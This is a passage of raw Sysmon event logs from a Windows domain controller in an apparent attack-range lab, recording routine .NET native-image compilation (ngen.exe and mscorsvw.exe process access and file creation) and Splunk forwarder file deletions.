21:06:13.015{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-AE04-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:12.999{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A245-60D3-AE04-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:12.999{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A245-60D3-AE04-00000000CF01}1084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:14.984{4DB9351A-A246-60D3-B704-00000000CF01}5284C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14a4-0\System.ServiceModel.Activation.dll2021-06-23 21:06:14.984 23542300x800000000000000021926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.703{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC44CEA1D590ED79C810329407CE634,SHA256=5321AAA6B55D8331D37256FC58F1272C9B7FA7C3560EE309CC022D95AF6CEBD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A246-60D3-B704-00000000CF01}5284C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.609{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A246-60D3-B704-00000000CF01}5284C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:14.609{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A246-60D3-B704-00000000CF01}5284C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:14.515{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A246-60D3-B604-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.499{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A246-60D3-B604-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:14.499{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A246-60D3-B604-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:14.421{4DB9351A-A246-60D3-B504-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\94c-0\System.Security.dll2021-06-23 21:06:14.421 23542300x800000000000000021918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.078{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52F784B9744A94A38E88BBD6619DBAC5,SHA256=6E6DBE7C98A7A9CF374601BFC67A321486976C49936146F3CA50D1AE94B836C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A246-60D3-B504-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.046{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A246-60D3-B504-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:14.046{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A246-60D3-B504-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:14.015{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A245-60D3-B404-00000000CF01}4860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.765{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2752441EC0461F03AFE70547C21A13CE,SHA256=80F329B6A864FE1B8EACF0F4AFAC3CBB08EEBFBB5DB88D9A42FFBC32C1007B1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:15.249{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A247-60D3-B904-00000000CF01}7040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.234{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A247-60D3-B904-00000000CF01}7040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:18.407{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24A-60D3-C204-00000000CF01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.390{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A24A-60D3-C204-00000000CF01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:18.390{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24A-60D3-C204-00000000CF01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:18.328{4DB9351A-A24A-60D3-C104-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1478-0\System.ServiceModel.Routing.dll2021-06-23 21:06:18.328 10341000x800000000000000021968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:18.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24A-60D3-C104-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:18.031{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A24A-60D3-C104-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:18.031{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24A-60D3-C104-00000000CF01}5240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:19.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24B-60D3-C704-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\W